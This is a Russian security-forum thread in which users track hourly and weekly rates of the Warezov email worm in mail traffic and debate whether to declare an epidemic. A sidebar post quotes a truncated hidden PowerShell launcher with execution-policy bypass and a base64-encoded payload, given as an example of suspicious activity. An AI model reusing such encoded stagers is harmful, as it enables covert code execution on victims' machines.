Перейти к содержанию
_Stout

Нас утро встречает... новый Warezov

Recommended Posts

_Stout

Приятно приходить на работу и видеть старого друга с новым имиджем. Email-Worm.Win32.Warezov.dn

| Время | % Warezov среди всех вирусов | % Warezov в потоке |

| 00:00:00 | 83.33 | 0.54 |

| 01:00:00 | 25.00 | 0.14 |

| 04:00:00 | 13.33 | 0.60 |

| 05:00:00 | 1.02 | 0.15 |

| 06:00:00 | 79.56 | 14.19 |

| 07:00:00 | 99.31 | 21.27 |

| 08:00:00 | 90.80 | 23.69 |

| 09:00:00 | 86.76 | 21.38 |

| 10:00:00 | 87.50 | 17.07 |

Сейчас утро понедельника и поток спама не очень высокий, но каждое пятое-шестое письмо с Warezov это слишком. Сегодняшная рассылка масштабнее рассылки Warezov.dc.

Это статистика за последние 7 дней

Email-Worm.Win32.Warezov.dn 28.7%

Email-Worm.Win32.Warezov.dc 17.2%

Email-Worm.Win32.Warezov.do 9.25%

Email-Worm.Win32.NetSky.q 5.47%

Email-Worm.Win32.NetSky.b 5.44%

Email-Worm.Win32.Warezov.dh 4.62%

Email-Worm.Win32.NetSky.aa 2.43%

Email-Worm.Win32.Warezov.dl 1.86%

Trojan-Spy.HTML.Bankfraud.od 1.10%

Other 23.8%

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
_Stout

Email-Worm.Win32.Warezov.dn 80.8%

Email-Worm.Win32.Warezov.do 3.75%

Email-Worm.Win32.NetSky.q 3.01%

Email-Worm.Win32.NetSky.b 2.88%

Email-Worm.Win32.NetSky.aa 1.70%

Trojan-Spy.HTML.Bankfraud.od 0.52%

Email-Worm.Win32.Warezov.dc 0.43%

Email-Worm.Win32.Mydoom.l 0.17%

Email-Worm.Win32.Warezov.dl 0.17%

Other 6.46%

До сих пор не спадает поток.

PS У MessageLabs статистика похожа, хоть и поток меньше. http://www.messagelabs.com/StatisticsThrea...tType=VirusTopX

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

_Stout, а в процентах от всех сообщений сколько заражено?

В первом посте была цифра 17% на 10.00, что сейчас?

P.S. Не понятно, почему никто не объвляет эпидемию ... :roll:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

Значить надо ждать, больных как я понял=))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Николай Головко

Как это никто не объявляет? давно объявлена с информационным статусом :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
_Stout
_Stout, а в процентах от всех сообщений сколько заражено?

В первом посте была цифра 17% на 10.00, что сейчас?

В первом сообщения я говорил о зараженных сообщениях в общем потоке писем (включая спам и нормальные письма). Т.е. практически каждое пятое письмо было Warezov. А 80% это кол-во среди всех зараженных писем сегодня.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×